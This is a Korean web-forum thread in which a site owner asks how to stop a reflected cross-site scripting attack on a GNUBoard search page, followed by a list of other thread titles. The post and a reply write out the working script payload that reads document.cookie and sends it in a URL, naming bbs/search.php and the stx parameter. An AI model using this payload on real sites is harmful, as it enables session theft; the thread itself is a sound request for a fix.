게시판에 아래 키워드를 입력하면..

나즈나

· 13년 전 · 조회 848 848 · 댓글 2 2

이 키워드를 입력하면 사이트에 에러가 나버리는데요..
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기

댓글 2개

취약점

프로필 보기 이 회원 글보기

13년 전

구체적으로 설명을해주셔야할것같습니다.
예를들어

http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>

이런식으로요.

어떤변수에어떻게넣는지 그런게 중요할듯하네요.

나즈나

프로필 보기 이 회원 글보기

13년 전

검색이니까 당연히 stx아닐까요.ㄷㄷ
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..

게시글 목록

번호	제목	글쓴이	조회	날짜
284438	extend 파일의 함수에서 is_member는 안먹힐까요? 1	모제코	3,854	11년 전
284437	게시판 답변을 작성할때 고정 이미지를 넣고싶습니다. 1	다이아레빗	2,760	11년 전
284435	영카트에서요 - 통장을 구매한고객과 카드결제로 구매한 고객 리스트를 받아와야하는데요~	앱보드	2,732	11년 전
284430	셀렉트에 색깔을 넣으려고 합니다. 6	alexseo	2,945	11년 전
284420	자동등록방지(캡차) 이미지 출력이 안되는 분들이 있답니다. 3	게르티	6,217	11년 전
284417	최근게시물 관련 초보 질문좀 드립니다. 6	장미란	3,240	11년 전
284409	name 이름을 어떻게 불러드리는지요. 6	alexseo	3,329	11년 전
284401	도메인 네임 이전 소유자 아는 방법 3	토라키	2,890	11년 전
284399	파일 업로드 질문(모바일 버젼 제작중) 6	리리치요	3,209	11년 전
284397	CHEditor5 관리자모드에서 오류	lsj9894	2,758	11년 전
284380	관리자 접속후 문제점 6	webart	3,803	11년 전
284378	어드민 메인페이지에서 문의의뢰최신글을 보여지게 하고싶은데 어떻게해야하나요? ㅠ 5	열라뽕똬이	2,710	11년 전
284371	리스트 페이징 관련 질문입니다. 1	뱅뱅뱅기	5,197	11년 전
284370	다량의 파일 업로드하는 방법에 대해서 묻고싶습니다. 3	xargs	2,789	11년 전
284366	포인트경매관련	붉은피쉬	2,434	11년 전
284364	실시간 접속자 질문합니당 답변 좀 부탁드립니다 5	제씨	3,395	11년 전
284360	소스하나만 질문드립니다 3	2쁘니	2,653	11년 전
284357	일괄적으로 포인트 주기?? 2	로보캅	3,601	11년 전
284355	파일 업로드 질문 5	리리치요	5,836	11년 전
284354	타 사이트의 게시글에 있는 이미지 복사 붙이기시 이미지가 보이지 않는 것에 대한 질문 입니다. 4	아이도요	4,635	11년 전

이전 다음

1 2 3 4

전체 목록